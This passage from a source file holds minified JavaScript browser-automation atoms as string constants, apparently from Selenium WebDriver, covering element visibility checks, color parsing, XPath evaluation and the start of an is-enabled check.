"ediumpurple:\"#9370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7"\
"b68ee\",mediumspringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediu"\
"mvioletred:\"#c71585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",m"\
"istyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",nav"\
"y:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23"\
"\",orange:\"#ffa500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegold"\
"enrod:\"#eee8aa\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palev"\
"ioletred:\"#db7093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:"\
"\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",pu"\
"rple:\"#800080\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#416"\
"9e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\""\
",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:"\
"\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#7080"\
"90\",slategrey:\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",ste"\
"elblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\""\
",tomato:\"#ff6347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f"\
"5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yel"\
"lowgreen:\"#9acd32\"};var ea=\"background-color border-top-color border"\
"-right-color border-bottom-color border-left-color color outline-color"\
"\".split(\" \"),fa=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function "\
"t(a){if(!u.test(a))throw Error(\"'\"+a+\"' is not a valid hex color\");"\
"4==a.length&&(a=a.replace(fa,\"#$1$1$2$2$3$3\"));return a.toLowerCase()"\
"}var u=/^#(?:[0-9a-f]{3}){1,2}$/i,ga=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{"\
"1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction v(a){var b=a.m"\
"atch(ga);if(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Numbe"\
"r(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return["\
"a,c,d,b]}return[]}var ha=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d"\
"{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;function x(a){var b=a.match(ha);if(b"\
"){a=Number(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<="\
"c&&255>=c&&0<=b&&255>=b)return[a,c,b]}return[]};function y(a,b){this.co"\
"de=a;this.state=z[a]||ia;this.message=b||\"\";var c=this.state.replace("\
"/((?:^|\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s"\
"\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"E"\
"rror\";this.name=c;c=Error(this.message);c.name=this.name;this.stack=c."\
"stack||\"\"}(function(){var a=Error;function b(){}b.prototype=a.prototy"\
"pe;y.I=a.prototype;y.prototype=new b})();\nvar ia=\"unknown error\",z={"\
"15:\"element not selectable\",11:\"element not visible\",31:\"ime engin"\
"e activation failed\",30:\"ime not available\",24:\"invalid cookie doma"\
"in\",29:\"invalid element coordinates\",12:\"invalid element state\",32"\
":\"invalid selector\",51:\"invalid selector\",52:\"invalid selector\",1"\
"7:\"javascript error\",405:\"unsupported operation\",34:\"move target o"\
"ut of bounds\",27:\"no such alert\",7:\"no such element\",8:\"no such f"\
"rame\",23:\"no such window\",28:\"script timeout\",33:\"session not cre"\
"ated\",10:\"stale element reference\",\n0:\"success\",21:\"timeout\",25"\
":\"unable to set cookie\",26:\"unexpected alert open\"};z[13]=ia;z[9]="\
"\"unknown command\";y.prototype.toString=function(){return this.name+\""\
": \"+this.message};var B;function C(a,b){this.x=void 0!==a?a:0;this.y=v"\
"oid 0!==b?b:0}C.prototype.toString=function(){return\"(\"+this.x+\", \""\
"+this.y+\")\"};C.prototype.ceil=function(){this.x=Math.ceil(this.x);thi"\
"s.y=Math.ceil(this.y);return this};C.prototype.floor=function(){this.x="\
"Math.floor(this.x);this.y=Math.floor(this.y);return this};C.prototype.r"\
"ound=function(){this.x=Math.round(this.x);this.y=Math.round(this.y);ret"\
"urn this};function D(a,b){this.width=a;this.height=b}D.prototype.toStri"\
"ng=function(){return\"(\"+this.width+\" x \"+this.height+\")\"};D.proto"\
"type.ceil=function(){this.width=Math.ceil(this.width);this.height=Math."\
"ceil(this.height);return this};D.prototype.floor=function(){this.width="\
"Math.floor(this.width);this.height=Math.floor(this.height);return this}"\
";D.prototype.round=function(){this.width=Math.round(this.width);this.he"\
"ight=Math.round(this.height);return this};var ja=3;function E(a,b){if(a"\
".contains&&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\"!=t"\
"ypeof a.compareDocumentPosition)return a==b||Boolean(a.compareDocumentP"\
"osition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction ka(a"\
",b){if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDocum"\
"entPosition(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceInd"\
"ex\"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return"\
" a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e"\
"==f?la(a,b):!c&&E(e,b)?-1*ma(a,b):!d&&E(f,a)?ma(b,a):(c?a.sourceIndex:e"\
".sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=F(a);c=d.createRange();"\
"c.selectNode(a);c.collapse(!0);d=d.createRange();d.selectNode(b);d.coll"\
"apse(!0);\nreturn c.compareBoundaryPoints(k.Range.START_TO_END,d)}funct"\
"ion ma(a,b){var c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNod"\
"e!=c;)d=d.parentNode;return la(d,a)}function la(a,b){for(var c=b;c=c.pr"\
"eviousSibling;)if(c==a)return-1;return 1}function F(a){return 9==a.node"\
"Type?a:a.ownerDocument||a.document}function na(a,b){a=a.parentNode;for("\
"var c=0;a;){if(b(a))return a;a=a.parentNode;c++}return null}function G("\
"a){this.p=a||k.document||document}\nfunction oa(a){var b=a.p;a=b.body;b"\
"=b.parentWindow||b.defaultView;return new C(b.pageXOffset||a.scrollLeft"\
",b.pageYOffset||a.scrollTop)}G.prototype.contains=E;function H(a){var b"\
"=null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerT"\
"ext:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1=="\
"c){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do"\
" 1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&"\
"&!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction"\
" I(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d)"\
"{return!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}fun"\
"ction J(a,b,c,d,e){return pa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||n"\
"ew K)}\nfunction pa(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b"\
".getElementsByName(d),p(b,function(b){a.matches(b)&&e.add(b)})):b.getEl"\
"ementsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),p(b,f"\
"unction(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTag"\
"Name&&(b=b.getElementsByTagName(a.getName()),p(b,function(a){I(a,c,d)&&"\
"e.add(a)}));return e}function qa(a,b,c,d,e){for(b=b.firstChild;b;b=b.ne"\
"xtSibling)I(b,c,d)&&a.matches(b)&&e.add(b);return e};function K(){this."\
"d=this.c=null;this.g=0}function ra(a){this.m=a;this.next=this.i=null}K."\
"prototype.unshift=function(a){a=new ra(a);a.next=this.c;this.d?this.c.i"\
"=a:this.c=this.d=a;this.c=a;this.g++};K.prototype.add=function(a){a=new"\
" ra(a);a.i=this.d;this.c?this.d.next=a:this.c=this.d=a;this.d=a;this.g+"\
"+};function sa(a){return(a=a.c)?a.m:null}function L(a){return new ta(a,"\
"!1)}function ta(a,b){this.F=a;this.j=(this.n=b)?a.d:a.c;this.r=null}\nt"\
"a.prototype.next=function(){var a=this.j;if(null==a)return null;var b=t"\
"his.r=a;this.j=this.n?a.i:a.next;return b.m};function M(a,b,c,d,e){b=b."\
"evaluate(d);c=c.evaluate(d);var f;if(b instanceof K&&c instanceof K){e="\
"L(b);for(d=e.next();d;d=e.next())for(b=L(c),f=b.next();f;f=b.next())if("\
"a(H(d),H(f)))return!0;return!1}if(b instanceof K||c instanceof K){b ins"\
"tanceof K?e=b:(e=c,c=b);e=L(e);b=typeof c;for(d=e.next();d;d=e.next()){"\
"switch(b){case \"number\":d=+H(d);break;case \"boolean\":d=!!H(d);break"\
";case \"string\":d=H(d);break;default:throw Error(\"Illegal primitive t"\
"ype for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolea"\
"n\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||"\
"\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function ua(a,b,c,d){this"\
".s=a;this.H=b;this.o=c;this.q=d}ua.prototype.toString=function(){return"\
" this.s};var va={};function N(a,b,c,d){if(a in va)throw Error(\"Binary "\
"operator already created: \"+a);a=new ua(a,b,c,d);va[a.toString()]=a}N("\
"\"div\",6,1,function(a,b,c){return a.b(c)/b.b(c)});N(\"mod\",6,1,functi"\
"on(a,b,c){return a.b(c)%b.b(c)});N(\"*\",6,1,function(a,b,c){return a.b"\
"(c)*b.b(c)});\nN(\"+\",5,1,function(a,b,c){return a.b(c)+b.b(c)});N(\"-"\
"\",5,1,function(a,b,c){return a.b(c)-b.b(c)});N(\"<\",4,2,function(a,b,"\
"c){return M(function(a,b){return a<b},a,b,c)});N(\">\",4,2,function(a,b"\
",c){return M(function(a,b){return a>b},a,b,c)});N(\"<=\",4,2,function(a"\
",b,c){return M(function(a,b){return a<=b},a,b,c)});N(\">=\",4,2,functio"\
"n(a,b,c){return M(function(a,b){return a>=b},a,b,c)});N(\"=\",3,2,funct"\
"ion(a,b,c){return M(function(a,b){return a==b},a,b,c,!0)});\nN(\"!=\",3"\
",2,function(a,b,c){return M(function(a,b){return a!=b},a,b,c,!0)});N(\""\
"and\",2,2,function(a,b,c){return a.f(c)&&b.f(c)});N(\"or\",1,2,function"\
"(a,b,c){return a.f(c)||b.f(c)});function wa(a,b,c,d,e,f,g,w,q){this.h=a"\
";this.o=b;this.D=c;this.C=d;this.B=e;this.q=f;this.A=g;this.w=void 0!=="\
"w?w:g;this.G=!!q}wa.prototype.toString=function(){return this.h};var xa"\
"={};function O(a,b,c,d,e,f,g,w){if(a in xa)throw Error(\"Function alrea"\
"dy created: \"+a+\".\");xa[a]=new wa(a,b,c,d,!1,e,f,g,w)}O(\"boolean\","\
"2,!1,!1,function(a,b){return b.f(a)},1);O(\"ceiling\",1,!1,!1,function("\
"a,b){return Math.ceil(b.b(a))},1);\nO(\"concat\",3,!1,!1,function(a,b){"\
"var c=da(arguments,1);return ba(c,function(b,c){return b+c.a(a)})},2,nu"\
"ll);O(\"contains\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return-1!="\
"b.indexOf(a)},2);O(\"count\",1,!1,!1,function(a,b){return b.evaluate(a)"\
".g},1,1,!0);O(\"false\",2,!1,!1,h(!1),0);O(\"floor\",1,!1,!1,function(a"\
",b){return Math.floor(b.b(a))},1);\nO(\"id\",4,!1,!1,function(a,b){var "\
"c=a.e(),d=9==c.nodeType?c:c.ownerDocument,c=b.a(a).split(/\\s+/),e=[];p"\
"(c,function(a){(a=d.getElementById(a))&&!r(e,a)&&e.push(a)});e.sort(ka)"\
";var f=new K;p(e,function(a){f.add(a)});return f},1);O(\"lang\",2,!1,!1"\
",h(!1),1);O(\"last\",1,!0,!1,function(a){if(1!=arguments.length)throw E"\
"rror(\"Function last expects ()\");return a.u()},0);O(\"local-name\",3,"\
"!1,!0,function(a,b){var c=b?sa(b.evaluate(a)):a.e();return c?c.nodeName"\
".toLowerCase():\"\"},0,1,!0);\nO(\"name\",3,!1,!0,function(a,b){var c=b"\
"?sa(b.evaluate(a)):a.e();return c?c.nodeName.toLowerCase():\"\"},0,1,!0"\
");O(\"namespace-uri\",3,!0,!1,h(\"\"),0,1,!0);O(\"normalize-space\",3,!"\
"1,!0,function(a,b){return(b?b.a(a):H(a.e())).replace(/[\\s\\xa0]+/g,\" "\
"\").replace(/^\\s+|\\s+$/g,\"\")},0,1);O(\"not\",2,!1,!1,function(a,b){"\
"return!b.f(a)},1);O(\"number\",1,!1,!0,function(a,b){return b?b.b(a):+H"\
"(a.e())},0,1);O(\"position\",1,!0,!1,function(a){return a.v()},0);O(\"r"\
"ound\",1,!1,!1,function(a,b){return Math.round(b.b(a))},1);\nO(\"starts"\
"-with\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return 0==b.lastIndex"\
"Of(a,0)},2);O(\"string\",3,!1,!0,function(a,b){return b?b.a(a):H(a.e())"\
"},0,1);O(\"string-length\",1,!1,!0,function(a,b){return(b?b.a(a):H(a.e("\
"))).length},0,1);\nO(\"substring\",3,!1,!1,function(a,b,c,d){c=c.b(a);i"\
"f(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.b(a):Infinity;if"\
"(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,"\
"0);a=b.a(a);if(Infinity==d)return a.substring(e);b=Math.round(d);return"\
" a.substring(e,c+b)},2,3);O(\"substring-after\",3,!1,!1,function(a,b,c)"\
"{b=b.a(a);a=c.a(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.leng"\
"th)},2);\nO(\"substring-before\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a"\
"(a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);O(\"sum\",1,!1"\
",!1,function(a,b){for(var c=L(b.evaluate(a)),d=0,e=c.next();e;e=c.next("\
"))d+=+H(e);return d},1,1,!0);O(\"translate\",3,!1,!1,function(a,b,c,d){"\
"b=b.a(a);c=c.a(a);var e=d.a(a);a=[];for(d=0;d<c.length;d++){var f=c.cha"\
"rAt(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)f=b.cha"\
"rAt(d),c+=f in a?a[f]:f;return c},3);O(\"true\",2,!1,!1,h(!0),0);functi"\
"on ya(a,b,c,d){this.h=a;this.t=b;this.n=c;this.J=d}ya.prototype.toStrin"\
"g=function(){return this.h};var za={};function P(a,b,c,d){if(a in za)th"\
"row Error(\"Axis already created: \"+a);za[a]=new ya(a,b,c,!!d)}P(\"anc"\
"estor\",function(a,b){for(var c=new K,d=b;d=d.parentNode;)a.matches(d)&"\
"&c.unshift(d);return c},!0);P(\"ancestor-or-self\",function(a,b){var c="\
"new K,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c}"\
",!0);\nP(\"attribute\",function(a,b){var c=new K,d=a.getName(),e=b.attr"\
"ibutes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e.getN"\
"amedItem(d))&&c.add(f);return c},!1);P(\"child\",function(a,b,c,d,e){re"\
"turn qa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new K)},!1,!0);P(\"des"\
"cendant\",J,!1,!0);P(\"descendant-or-self\",function(a,b,c,d){var e=new"\
" K;I(b,c,d)&&a.matches(b)&&e.add(b);return J(a,b,c,d,e)},!1,!0);\nP(\"f"\
"ollowing\",function(a,b,c,d){var e=new K;do for(var f=b;f=f.nextSibling"\
";)I(f,c,d)&&a.matches(f)&&e.add(f),e=J(a,f,c,d,e);while(b=b.parentNode)"\
";return e},!1,!0);P(\"following-sibling\",function(a,b){for(var c=new K"\
",d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);P(\"namespac"\
"e\",function(){return new K},!1);P(\"parent\",function(a,b){var c=new K"\
";if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement"\
"),c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nP(\"prece"\
"ding\",function(a,b,c,d){var e=new K,f=[];do f.unshift(b);while(b=b.par"\
"entNode);for(var g=1,w=f.length;g<w;g++){var q=[];for(b=f[g];b=b.previo"\
"usSibling;)q.unshift(b);for(var A=0,Ia=q.length;A<Ia;A++)b=q[A],I(b,c,d"\
")&&a.matches(b)&&e.add(b),e=J(a,b,c,d,e)}return e},!0,!0);P(\"preceding"\
"-sibling\",function(a,b){for(var c=new K,d=b;d=d.previousSibling;)a.mat"\
"ches(d)&&c.unshift(d);return c},!0);P(\"self\",function(a,b){var c=new "\
"K;a.matches(b)&&c.add(b);return c},!1);var Aa=function(){var a={K:\"htt"\
"p://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}();\nf"\
"unction Ba(a,b){var c=function(){var c;var e=F(b);try{var f=e.createNSR"\
"esolver?e.createNSResolver(e.documentElement):Aa;c=e.evaluate(a,b,f,9,n"\
"ull)}catch(g){throw new y(32,\"Unable to locate an element with the xpa"\
"th expression \"+a+\" because of the following error:\\n\"+g);}return c"\
"?c.singleNodeValue||null:b.selectSingleNode?(c=F(b),c.setProperty&&c.se"\
"tProperty(\"SelectionLanguage\",\"XPath\"),b.selectSingleNode(a)):null}"\
"();if(null!==c&&(!c||1!=c.nodeType))throw new y(32,'The result of the x"\
"path expression \"'+\na+'\" is: '+c+\". It should be an element.\");ret"\
"urn c};function Q(a,b,c,d){this.left=a;this.top=b;this.width=c;this.hei"\
"ght=d}Q.prototype.toString=function(){return\"(\"+this.left+\", \"+this"\
".top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};Q.prototype.contai"\
"ns=function(a){return a instanceof Q?this.left<=a.left&&this.left+this."\
"width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top+a.h"\
"eight:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y<=th"\
"is.top+this.height};\nQ.prototype.ceil=function(){this.left=Math.ceil(t"\
"his.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this.width)"\
";this.height=Math.ceil(this.height);return this};Q.prototype.floor=func"\
"tion(){this.left=Math.floor(this.left);this.top=Math.floor(this.top);th"\
"is.width=Math.floor(this.width);this.height=Math.floor(this.height);ret"\
"urn this};\nQ.prototype.round=function(){this.left=Math.round(this.left"\
");this.top=Math.round(this.top);this.width=Math.round(this.width);this."\
"height=Math.round(this.height);return this};function Ca(a,b){var c=F(a)"\
";return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.defaultView"\
".getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\"\"}funct"\
"ion R(a){return Ca(a,\"position\")||(a.currentStyle?a.currentStyle.posi"\
"tion:null)||a.style&&a.style.position}function Da(a){var b;try{b=a.getB"\
"oundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom:0}}retu"\
"rn b}\nfunction Ea(a){var b=F(a),c=R(a),d=\"fixed\"==c||\"absolute\"==c"\
";for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=R(a),d=d&&\"static\"==c"\
"&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWidth||a.s"\
"crollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"relative\""\
"==c))return a;return null}\nfunction Fa(a){if(1==a.nodeType){var b;if(a"\
".getBoundingClientRect)b=Da(a),b=new C(b.left,b.top);else{b=oa(a?new G("\
"F(a)):B||(B=new G));var c=F(a),d=R(a),e=new C(0,0),f=(c?F(c):document)."\
"documentElement;if(a!=f)if(a.getBoundingClientRect)a=Da(a),c=oa(c?new G"\
"(F(c)):B||(B=new G)),e.x=a.left+c.x,e.y=a.top+c.y;else if(c.getBoxObjec"\
"tFor)a=c.getBoxObjectFor(a),c=c.getBoxObjectFor(f),e.x=a.screenX-c.scre"\
"enX,e.y=a.screenY-c.screenY;else{var g=a;do{e.x+=g.offsetLeft;e.y+=g.of"\
"fsetTop;g!=a&&(e.x+=g.clientLeft||\n0,e.y+=g.clientTop||0);if(\"fixed\""\
"==R(g)){e.x+=c.body.scrollLeft;e.y+=c.body.scrollTop;break}g=g.offsetPa"\
"rent}while(g&&g!=a);\"absolute\"==d&&(e.y-=c.body.offsetTop);for(g=a;(g"\
"=Ea(g))&&g!=c.body&&g!=f;)e.x-=g.scrollLeft,e.y-=g.scrollTop}b=new C(e."\
"x-b.x,e.y-b.y)}return b}b=\"function\"==l(a.k);e=a;a.targetTouches?e=a."\
"targetTouches[0]:b&&a.k().targetTouches&&(e=a.k().targetTouches[0]);ret"\
"urn new C(e.clientX,e.clientY)};function S(a,b){return!!a&&1==a.nodeTyp"\
"e&&(!b||a.tagName.toUpperCase()==b)}function T(a){for(a=a.parentNode;a&"\
"&1!=a.nodeType&&9!=a.nodeType&&11!=a.nodeType;)a=a.parentNode;return S("\
"a)?a:null}\nfunction U(a,b){var c=aa(b);if(\"float\"==c||\"cssFloat\"=="\
"c||\"styleFloat\"==c)c=\"cssFloat\";c=Ca(a,c)||Ga(a,c);if(null===c)c=nu"\
"ll;else if(r(ea,b)&&(u.test(\"#\"==c.charAt(0)?c:\"#\"+c)||x(c).length|"\
"|s&&s[c.toLowerCase()]||v(c).length)){var d=v(c);if(!d.length){a:if(d=x"\
"(c),!d.length){d=(d=s[c.toLowerCase()])?d:\"#\"==c.charAt(0)?c:\"#\"+c;"\
"if(u.test(d)&&(d=t(d),d=t(d),d=[parseInt(d.substr(1,2),16),parseInt(d.s"\
"ubstr(3,2),16),parseInt(d.substr(5,2),16)],d.length))break a;d=[]}3==d."\
"length&&d.push(1)}c=4!=d.length?\nc:\"rgba(\"+d.join(\", \")+\")\"}retu"\
"rn c}function Ga(a,b){var c=a.currentStyle||a.style,d=c[b];void 0===d&&"\
"\"function\"==l(c.getPropertyValue)&&(d=c.getPropertyValue(b));return\""\
"inherit\"!=d?void 0!==d?d:null:(c=T(a))?Ga(c,b):null}\nfunction V(a,b){"\
"function c(a){if(\"none\"==U(a,\"display\"))return!1;a=T(a);return!a||c"\
"(a)}function d(a){var b=W(a);return 0<b.height&&0<b.width?!0:S(a,\"PATH"\
"\")&&(0<b.height||0<b.width)?(a=U(a,\"stroke-width\"),!!a&&0<parseInt(a"\
",10)):\"hidden\"!=U(a,\"overflow\")&&ca(a.childNodes,function(a){return"\
" a.nodeType==ja||S(a)&&d(a)})}function e(a){var b=U(a,\"-o-transform\")"\
"||U(a,\"-webkit-transform\")||U(a,\"-ms-transform\")||U(a,\"-moz-transf"\
"orm\")||U(a,\"transform\");if(b&&\"none\"!==b)return b=Fa(a),a=W(a),0<="\
"b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=T(a);return!a||e(a)}if(!S(a))thr"\
"ow Error(\"Argument to isShown must be of type Element\");if(S(a,\"OPTI"\
"ON\")||S(a,\"OPTGROUP\")){var f=na(a,function(a){return S(a,\"SELECT\")"\
"});return!!f&&V(f,!0)}return(f=Ha(a))?!!f.l&&0<f.rect.width&&0<f.rect.h"\
"eight&&V(f.l,b):S(a,\"INPUT\")&&\"hidden\"==a.type.toLowerCase()||S(a,"\
"\"NOSCRIPT\")||\"hidden\"==U(a,\"visibility\")||!c(a)||!b&&0==Ja(a)||!d"\
"(a)||Ka(a)==X?!1:e(a)}var X=\"hidden\";\nfunction Ka(a){function b(a){v"\
"ar b=a;if(\"visible\"==w)if(a==f)b=g;else if(a==g)return{x:\"visible\","\
"y:\"visible\"};b={x:U(b,\"overflow-x\"),y:U(b,\"overflow-y\")};a==f&&(b"\
".x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"hidden\"==b.y?\"hidden\":"\
"\"auto\");return b}function c(a){var b=U(a,\"position\");if(\"fixed\"=="\
"b)return f;for(a=T(a);a&&a!=f&&(0==U(a,\"display\").lastIndexOf(\"inlin"\
"e\",0)||\"absolute\"==b&&\"static\"==U(a,\"position\"));)a=T(a);return "\
"a}var d=W(a),e=F(a),f=e.documentElement,g=e.body,w=U(f,\"overflow\");fo"\
"r(a=c(a);a;a=\nc(a)){var q=W(a),e=b(a),A=d.left>=q.left+q.width,q=d.top"\
">=q.top+q.height;if(A&&\"hidden\"==e.x||q&&\"hidden\"==e.y)return X;if("\
"A&&\"visible\"!=e.x||q&&\"visible\"!=e.y)return Ka(a)==X?X:\"scroll\"}r"\
"eturn\"none\"}\nfunction W(a){var b=Ha(a);if(b)return b.rect;if(\"funct"\
"ion\"==l(a.getBBox))try{var c=a.getBBox();return new Q(c.x,c.y,c.width,"\
"c.height)}catch(d){throw d;}else{if(S(a,\"HTML\"))return a=((F(a)?F(a)."\
"parentWindow||F(a).defaultView:window)||window).document,a=\"CSS1Compat"\
"\"==a.compatMode?a.documentElement:a.body,a=new D(a.clientWidth,a.clien"\
"tHeight),new Q(0,0,a.width,a.height);var b=Fa(a),c=a.offsetWidth,e=a.of"\
"fsetHeight;c||(e||!a.getBoundingClientRect)||(a=a.getBoundingClientRect"\
"(),c=a.right-a.left,e=a.bottom-\na.top);return new Q(b.x,b.y,c,e)}}func"\
"tion Ha(a){var b=S(a,\"MAP\");if(!b&&!S(a,\"AREA\"))return null;var c=b"\
"?a:S(a.parentNode,\"MAP\")?a.parentNode:null,d=null,e=null;if(c&&c.name"\
"&&(d=Ba('/descendant::*[@usemap = \"#'+c.name+'\"]',F(c)))&&(e=W(d),!b&"\
"&\"default\"!=a.shape.toLowerCase())){var f=La(a);a=Math.min(Math.max(f"\
".left,0),e.width);b=Math.min(Math.max(f.top,0),e.height);c=Math.min(f.w"\
"idth,e.width-a);f=Math.min(f.height,e.height-b);e=new Q(a+e.left,b+e.to"\
"p,c,f)}return{l:d,rect:e||new Q(0,0,0,0)}}\nfunction La(a){var b=a.shap"\
"e.toLowerCase();a=a.coords.split(\",\");if(\"rect\"==b&&4==a.length){va"\
"r b=a[0],c=a[1];return new Q(b,c,a[2]-b,a[3]-c)}if(\"circle\"==b&&3==a."\
"length)return b=a[2],new Q(a[0]-b,a[1]-b,2*b,2*b);if(\"poly\"==b&&2<a.l"\
"ength){for(var b=a[0],c=a[1],d=b,e=c,f=2;f+1<a.length;f+=2)b=Math.min(b"\
",a[f]),d=Math.max(d,a[f]),c=Math.min(c,a[f+1]),e=Math.max(e,a[f+1]);ret"\
"urn new Q(b,c,d-b,e-c)}return new Q(0,0,0,0)}\nfunction Ja(a){var b=1,c"\
"=U(a,\"opacity\");c&&(b=Number(c));(a=T(a))&&(b*=Ja(a));return b};var M"\
"a=V,Y=[\"_\"],Z=k;Y[0]in Z||!Z.execScript||Z.execScript(\"var \"+Y[0]);"\
"for(var $;Y.length&&($=Y.shift());)Y.length||void 0===Ma?Z=Z[$]?Z[$]:Z["\
"$]={}:Z[$]=Ma;; return this._.apply(null,arguments);}.apply({navigator:"\
"typeof window!=undefined?window.navigator:null,document:typeof window!="\
"undefined?window.document:null}, arguments);}"
IS_ENABLED = \
"function(){return function(){function g(a){return function(){return a}}"\
"var h=this;function k(a){return\"string\"==typeof a};var l=Array.protot"\
"ype;function m(a,b){if(k(a))return k(b)&&1==b.length?a.indexOf(b,0):-1;"\
"for(var c=0;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1}functi"\
"on p(a,b){for(var c=a.length,d=k(a)?a.split(\"\"):a,e=0;e<c;e++)e in d&"\
"&b.call(void 0,d[e],e,a)}function q(a,b){if(a.reduce)return a.reduce(b,"\
"\"\");var c=\"\";p(a,function(d,e){c=b.call(void 0,c,d,e,a)});return c}"\
"function r(a,b,c){return 2>=arguments.length?l.slice.call(a,b):l.slice."\
"call(a,b,c)};function s(a){for(;a&&1!=a.nodeType;)a=a.previousSibling;r"\
"eturn a}function u(a,b){if(a.contains&&1==b.nodeType)return a==b||a.con"\
"tains(b);if(\"undefined\"!=typeof a.compareDocumentPosition)return a==b"\
"||Boolean(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode"\
";return b==a}\nfunction w(a,b){if(a==b)return 0;if(a.compareDocumentPos"\
"ition)return a.compareDocumentPosition(b)&2?1:-1;if(\"sourceIndex\"in a"\
"||a.parentNode&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeType,d=1"\
"==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentN"\
"ode,f=b.parentNode;return e==f?x(a,b):!c&&u(e,b)?-1*y(a,b):!d&&u(f,a)?y"\
"(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d"\
"=9==a.nodeType?a:a.ownerDocument||a.document;c=d.createRange();c.select"\
"Node(a);c.collapse(!0);\nd=d.createRange();d.selectNode(b);d.collapse(!"\
"0);return c.compareBoundaryPoints(h.Range.START_TO_END,d)}function y(a,"\
"b){var c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;)d=d"\
".parentNode;return x(d,a)}function x(a,b){for(var c=b;c=c.previousSibli"\
"ng;)if(c==a)return-1;return 1}function z(a,b){for(var c=0;a;){if(b(a))r"\
